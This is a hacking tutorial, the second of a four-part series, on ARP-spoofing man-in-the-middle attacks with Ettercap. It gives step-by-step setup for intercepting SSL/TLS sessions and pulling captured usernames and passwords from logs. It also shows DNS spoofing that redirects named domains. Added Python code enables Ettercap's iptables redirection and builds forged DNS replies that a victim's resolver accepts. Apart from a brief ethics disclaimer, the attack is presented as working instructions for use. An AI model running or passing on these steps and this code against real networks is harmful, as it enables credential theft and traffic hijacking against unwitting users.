How to ARP Spoof - Man In The Middle Attacks
This is the second segment of a four part tutorial covering the most common situations in which ARP spoofing is utilized and the mechanics involved. In this segment I will cover a couple of man in the middle (MITM) attacks that become possible once you are ARP spoofing, using the GUI version of Ettercap (available in Backtrack). Please maintain your ethics and don't misuse this information; it is for educational purposes and I am not responsible for any illegal activities!
How this tutorial is divided:
This tutorial assumes you have a good understanding of how ARP works within a LAN and the concepts involved in basic ARP spoofing. If you do not please review Part 1: Sniffing LAN Traffic and my ARP spoofing PowerPoint.
Tutorial Quick Links:
Part 1: Sniffing LAN Traffic
Part 2: Man in the Middle Attacks (MITM)
Part 3: Denial of Service (DoS)
Part 4: Using Filters
Part 2: Man in the Middle Attacks (MITM)
Check out the video tutorial on YouTube!
Description of the attack (Active Spoofing):
An attacker on the local network poisons the ARP caches of two or more hosts so that each maps the other's IP address to the attacker's MAC address. Their traffic is then forwarded through the attacker, who can read or manipulate the data using the filters and plugins available in Ettercap before forwarding the altered data on to its original destination.
Methodology
In the last segment I briefly discussed enumeration, that is, the process of discovering the hosts on the network. Another important step in exploring a network is "network fingerprinting" or "blueprinting". I will save the details for a future tutorial, but the basic purpose is to take the hosts you have enumerated and determine what they are, what ports they have open, what services they offer, and what vulnerabilities may exist. Good tools for this purpose built into Backtrack are Autoscan and GFI LANguard. The reason we do this is to know which host to target for a specific attack: if you want to spoof DNS replies you need to sit between the clients and the DNS server, and the same goes for an SMB server. After establishing our targets we can then decide how to alter the transmissions with either plugins or filters.
More on Plugins
Ettercap comes with several built in plugins that perform preset functions on the victims you are spoofing. At any time during your ARP spoof you can select Plugins -> Manage the plugins to display a list of them; activate a plugin by double clicking on it. Plugins include DNS spoofing, remote browser viewing, DoS, and many more.
Example MITM Attacks in Backtrack
SSL Spoofing
Spoofing SSL or TLS is an ability built into Ettercap that lets us see what should be encrypted data in plain text. It works by fetching the real certificate from the remote server, then presenting the client a look-alike certificate that Ettercap generates itself, copying the server's certificate fields but signing it with Ettercap's own key. Because the client now negotiates its session with Ettercap, Ettercap holds the key for that session and decrypts everything the client sends. Finally Ettercap opens its own legitimate TLS session to the real server, re-encrypts the data and submits it to the original destination, so two separate encrypted sessions exist with the attacker in the middle of both.
Note: You need to edit the etter.conf file in order to make this work. It is normally in the "/usr/local/etc/" directory (distribution packages may install it as /etc/etter.conf instead); if it is not there try typing "whereis etter.conf" or "find / -name etter.conf" at the command prompt. In the run dialog box or at a command prompt type "kate"; once Kate is open go to File -> Open and in the location box type "/usr/local/etc/etter.conf". In the first section of this file, labeled "[privs]", change:
ec_uid = 65534
ec_gid = 65534
to
ec_uid = 0
ec_gid = 0
These settings are the user and group Ettercap drops to after startup; setting them to 0 keeps it running as root, which it needs in order to run the iptables redirection command below. Next go down to line 167 where it says "if you use iptables" and uncomment lines 168 and 169 by removing the "#" signs. Each of these lines continues with the full iptables command; leave the rest of the line unchanged.
#redir_command_on
#redir_command_off
to
redir_command_on
redir_command_off
That's basically all the configuration you have to do to make this work. Now just start ARP spoofing a target as described in the first tutorial and Ettercap will automatically spoof the certificates for you; it will also notify you in the bottom pane when it has collected any data. The fake certificate copies the subject, validity period and other fields of the real one, but it is signed by Ettercap's own key rather than a trusted certificate authority, so its issuer, signature and fingerprint differ from the original. For this reason the browser will warn the user and ask whether to accept the certificate; a user who examines it may simply assume a server misconfiguration. Note that a browser that already knows the site via HSTS, or that pins the site's certificate, will refuse the connection outright instead of offering a prompt. To view the captured data you can either use the Wireshark method discussed in part 1 or select Logging -> "Log only info's" in Ettercap's GUI to save the relevant data to a log file. To view this file just type "etterlog logname.log" and Etterlog will display all the captured usernames and passwords under the Account sections of the output.
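The etter.conf edits above are easy to get half right (one of the two lines still commented, the uid changed but not the gid), and the reason they matter is not explained by the file itself. The following added example, which is not part of the original tutorial or of Ettercap, checks a constructed excerpt of etter.conf for the SSL MITM prerequisites, applies the edits the tutorial describes, and renders the iptables rule Ettercap ends up running. The excerpt, the section names and the %iface/%port/%rport placeholders follow the layout of the stock etter.conf as I remember it, and the interface and port numbers are made up for the demonstration.

```python
import re

# Constructed excerpt of an unedited etter.conf: only the lines the tutorial touches.
DEFAULT_CONF = """
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534

[strings]
# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
"""


def parse_conf(text):
    """Return {section: {key: (value, commented_out)}} for every 'key = value' line.

    A line that is commented out is still recorded so that a missing
    setting can be distinguished from one that is present but disabled.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        section = re.match(r"\[(\w+)\]", line)
        if section:
            current = sections.setdefault(section.group(1), {})
            continue
        commented = line.startswith("#")
        body = line.lstrip("#").strip()
        kv = re.match(r"(\w+)\s*=\s*(.*)", body)
        if kv and current is not None:
            key = kv.group(1)
            value = kv.group(2).split("#", 1)[0].strip().strip('"')
            # An active setting wins over a commented-out copy of the same key.
            if key not in current or current[key][1]:
                current[key] = (value, commented)
    return sections


def check_ssl_mitm_prereqs(text):
    """List the problems that would stop Ettercap's SSL MITM from working."""
    conf = parse_conf(text)
    problems = []
    privs = conf.get("privs", {})
    for key in ("ec_uid", "ec_gid"):
        value, _ = privs.get(key, (None, True))
        if value != "0":
            problems.append(f"{key} is {value!r}; must be 0 so ettercap keeps root for iptables")
    strings = conf.get("strings", {})
    for key in ("redir_command_on", "redir_command_off"):
        value, commented = strings.get(key, (None, True))
        if commented or not value:
            problems.append(f"{key} is commented out or missing; uncomment the iptables line")
    return problems


def apply_fix(text):
    """Apply the tutorial's edits: uid/gid to 0, and uncomment the iptables redirection lines."""
    out = []
    for raw in text.splitlines():
        s = raw.strip()
        if s.startswith("ec_uid") or s.startswith("ec_gid"):
            raw = f"{s.split('=')[0].strip()} = 0"
        elif s.startswith("#redir_command_on") or s.startswith("#redir_command_off"):
            raw = raw.replace("#", "", 1)
        out.append(raw)
    return "\n".join(out)


def render_redir(command, iface, port, rport):
    """Fill the placeholders the way Ettercap does when it runs the command."""
    return (command.replace("%iface", iface)
                   .replace("%port", str(port))
                   .replace("%rport", str(rport)))


if __name__ == "__main__":
    for problem in check_ssl_mitm_prereqs(DEFAULT_CONF):
        print("before:", problem)
    fixed = apply_fix(DEFAULT_CONF)
    print("after: ", check_ssl_mitm_prereqs(fixed) or "ok")
    cmd = parse_conf(fixed)["strings"]["redir_command_on"][0]
    print(render_redir(cmd, "eth0", 443, 1234))   # hypothetical interface and redirect port
```

The rendered rule is the whole trick: every TCP connection to port 443 that enters the attacker's interface from a poisoned victim is redirected to Ettercap's local listener, which is why Ettercap must keep root (to add the nat rule) and why the redirection lines must be active.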
DNS Spoofing
To perform the DNS spoofing attack via Ettercap we use the built in dns_spoof plugin, which must first be configured in the etter.dns file with the domain names and the IP addresses you want them to resolve to. When this plugin is active it watches the DNS queries passing through the attacker and looks for a name you have specified in this file. If it finds a match it answers the query itself with a forged reply carrying your address (the client takes the first answer with a matching transaction ID, and the forged one arrives before the real server's). This works for A, PTR and MX records, and wildcards are accepted for all but the PTR type. Remember that most hosts have a DNS resolver cache, so if they already have the address cached they will not send a query for it (ipconfig /flushdns clears this on Windows).
To get started open up Kate and open "/usr/local/share/ettercap/etter.dns". Reading through this file will give you some good examples of the syntax, but here are some quick examples:
www.google.com A 66.48.69.100 - www.google.com now resolves to 66.48.69.100 (www.webkins.com)
*.yahoo.com A 164.109.32.152 - any name under yahoo.com resolves to 164.109.32.152 (www.mcdonalds.com)
I would save the original file under another name and create a new etter.dns in this directory. Once you are done adding your entries, save the file and open Ettercap. For this attack you want the victims' DNS traffic to pass through you, so target the DNS server they use; this is why network blueprinting is important, because the DNS server is not always the gateway! Add the DNS server to target 1 and your hosts to target 2. Now click Plugins -> Manage the plugins and in this list double click "dns_spoof". Start ARP spoofing the targets as usual and the attack should be underway. Ettercap will notify you in the bottom pane when a DNS spoof has occurred.
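To make concrete what the plugin does with a query it sees, here is an added example (my own code, not part of the original tutorial or of Ettercap) that parses etter.dns-style rules, takes a DNS query as it would appear on the wire, and builds the forged reply that the victim will accept. The rules, the transaction ID and the queried names are constructed for the demonstration; the wildcard matching uses shell-style globbing, which is an assumption about how the real plugin matches and is sufficient for the "*.yahoo.com" case above.

```python
import fnmatch
import socket
import struct

QTYPE_A = 1
QCLASS_IN = 1

# Constructed rules in etter.dns syntax (addresses taken from the examples above).
ETTER_DNS = """
# name             type   address
www.google.com     A      66.48.69.100
*.yahoo.com        A      164.109.32.152
"""


def parse_etter_dns(text):
    """Parse 'NAME TYPE ADDRESS' lines; '#' starts a comment. Wildcards are refused for PTR."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3:
            raise ValueError(f"malformed rule: {raw!r}")
        name, rtype, value = parts
        rtype = rtype.upper()
        if rtype not in ("A", "PTR", "MX"):
            raise ValueError(f"unsupported record type: {raw!r}")
        if rtype == "PTR" and "*" in name:
            raise ValueError(f"wildcards are not allowed for PTR: {raw!r}")
        rules.append((name.lower(), rtype, value))
    return rules


def lookup(rules, qname, rtype):
    """First rule whose pattern matches the queried name, or None to leave the query alone."""
    qname = qname.lower().rstrip(".")
    for pattern, rt, value in rules:
        if rt == rtype and fnmatch.fnmatchcase(qname, pattern):
            return value
    return None


def encode_name(name):
    """Wire-format name: length-prefixed labels terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split(".")) + b"\x00"


def decode_name(data, offset):
    """Decode a possibly compressed name; returns (name, offset after it)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:                      # compression pointer to an earlier name
            ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            labels.append(decode_name(data, ptr)[0])
            return ".".join(labels), offset + 2
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid, name, qtype=QTYPE_A):
    """A standard recursive query as a stub resolver would send it."""
    return struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(data):
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", data[:12])
    if flags & 0x8000 or qdcount != 1:                 # a response, or not a simple one-question query
        return None
    name, off = decode_name(data, 12)
    qtype, qclass = struct.unpack("!HH", data[off:off + 4])
    return txid, name, qtype, qclass, data[12:off + 4]


def forge_reply(query, rules, ttl=3600):
    """Answer a sniffed A query with the rule's address; None means let the real reply through."""
    parsed = parse_query(query)
    if parsed is None:
        return None
    txid, name, qtype, qclass, question = parsed
    if qtype != QTYPE_A or qclass != QCLASS_IN:
        return None
    ip = lookup(rules, name, "A")
    if ip is None:
        return None
    # Same transaction ID as the query (that is all the client checks), QR/RD/RA set, one answer.
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    answer = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


def parse_reply(data):
    """What the victim's resolver extracts: (txid, flags, queried name, [(name, ip), ...])."""
    txid, flags, _, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    name, off = decode_name(data, 12)
    off += 4
    answers = []
    for _ in range(ancount):
        aname, off = decode_name(data, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        if rtype == QTYPE_A:
            answers.append((aname, socket.inet_ntoa(data[off:off + rdlen])))
        off += rdlen
    return txid, flags, name, answers


if __name__ == "__main__":
    rules = parse_etter_dns(ETTER_DNS)
    reply = forge_reply(build_query(0x1234, "mail.yahoo.com"), rules)
    print(parse_reply(reply))
```

Two details worth noticing: the reply only has to carry the victim's transaction ID and question to be accepted, which is why being on the path (so the forged reply wins the race) is the whole attack; and a query for a name with no rule returns None, so unlisted names are still answered by the real server and the victim sees nothing unusual.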
Conclusion
In the next segment I will expand on these ideas further by showing how ARP spoofing with Ettercap and its plugins can be used to perform denial of service (DoS) attacks on single or multiple targets. As usual, if you have any questions or requests feel free to post them.
r00tk1ll | BeyondTheBit